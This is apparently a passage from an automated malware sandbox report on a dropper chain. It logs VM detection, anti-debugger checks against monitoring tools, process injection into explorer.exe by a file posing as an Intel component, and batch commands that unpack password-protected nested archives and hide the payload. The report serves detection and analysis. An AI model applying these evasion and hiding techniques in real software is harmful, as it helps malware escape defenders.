                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                            Source: random.exe_Y.exe, 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmp, d7691cd336.exe, 00000024.00000002.2843563902.0000000000814000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                            Source: random.exe_Y.exe, 00000000.00000003.2155732497.0000000000DB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'Qt
                            Source: svchost.exe, 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                            Source: d7691cd336.exe, 00000024.00000002.2844879469.0000000002767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCIDevSymbol
                            Source: skotes.exe, 00000006.00000002.3383542178.0000000000598000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2790543601.0000000000759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: explorer.exe, 00000020.00000002.2790543601.0000000000759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP\v%SystemRoot%\system32\mswsock.dll
                            Source: svchost.exe, 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                            Source: random.exe_Y.exe, 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmp, d7691cd336.exe, 00000024.00000002.2843563902.0000000000814000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                            Source: explorer.exe, 00000020.00000002.2790543601.0000000000759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl/
                            Source: PING.EXE, 0000001E.00000002.2809128552.000001F26410D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldd
                            Source: PING.EXE, 00000023.00000002.2820733194.000002CB3DF49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10450
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-9976
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-9983
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Source: C:\Users\user\Desktop\random.exe_Y.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeThread information set: HideFromDebugger
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeThread information set: HideFromDebugger
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: gbdyllo
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: procmon_window_class
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: ollydbg
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile opened: NTICE
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile opened: SICE
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile opened: SIWVID
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\explorer.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeProcess queried: DebugPort
                            Source: C:\Windows\explorer.exeProcess queried: DebugPort
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_04BF0DA1 rdtsc 0_2_04BF0DA1
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,8_2_00402665
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000D652B mov eax, dword ptr fs:[00000030h]0_2_000D652B
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000DA302 mov eax, dword ptr fs:[00000030h]0_2_000DA302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BBA302 mov eax, dword ptr fs:[00000030h]2_2_00BBA302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB652B mov eax, dword ptr fs:[00000030h]2_2_00BB652B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BBA302 mov eax, dword ptr fs:[00000030h]3_2_00BBA302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BB652B mov eax, dword ptr fs:[00000030h]3_2_00BB652B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BBA302 mov eax, dword ptr fs:[00000030h]6_2_00BBA302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB652B mov eax, dword ptr fs:[00000030h]6_2_00BB652B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeMemory written: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeMemory written: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 140000000 value: 4D
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 140001000 value: 40
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 1402DD000 value: 58
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 14040B000 value: A4
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 140739000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 14075E000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 14075F000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 140762000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 140764000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 140765000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2548 base: 572010 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 140000000 value: 4D
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 140001000 value: 40
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 1402DD000 value: 58
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 14040B000 value: A4
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 140739000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 14075E000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 14075F000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 140762000 value: 48
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 140764000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: 140765000 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 3912 base: BDA010 value: 00
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 2548
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 3912
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe "C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe "C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe "C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeProcess created: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00402744
                            Source: random.exe_Y.exe, 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: o.jg{Program Manager
                            Source: d7691cd336.exe, 00000024.00000002.2843563902.0000000000814000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Program Manager
                            Source: random.exe_Y.exe, 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: .jg{Program Manager
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B9DD91 cpuid 6_2_00B9DD91
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,8_2_0040247D
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000BCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_000BCBEA
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BC2517 GetTimeZoneInformation,6_2_00BC2517
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPA